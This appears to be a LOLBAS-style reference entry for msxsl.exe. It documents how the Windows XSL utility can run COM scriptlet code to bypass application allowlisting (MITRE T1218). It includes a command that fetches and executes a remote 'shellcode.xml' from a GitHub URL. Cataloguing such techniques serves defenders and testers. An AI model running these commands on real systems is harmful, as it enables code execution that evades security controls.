.. / msxsl.exe
Star

Command line utility used to perform XSL transformations.


Paths:


Resources:
https://twitter.com/subTee/status/877616321747271680
https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker

Acknowledgement:
Casey Smith - @subtee


Detection:



Execute

Run COM Scriptlet code within the script.xsl file (local).
msxsl.exe customers.xml script.xsl
Usecase:Local execution of script stored in XSL file.
Privileges required:User
OS:Windows
Mitre:T1218



Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
Usecase:Local execution of remote script stored in XSL script stored as an XML file.
Privileges required:User
OS:Windows
Mitre:T1218



AWL bypass

Run COM Scriptlet code within the script.xsl file (local).
msxsl.exe customers.xml script.xsl
Usecase:Local execution of script stored in XSL file.
Privileges required:User
OS:Windows
Mitre:T1218



Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
Usecase:Local execution of remote script stored in XSL script stored as an XML file.
Privileges required:User
OS:Windows
Mitre:T1218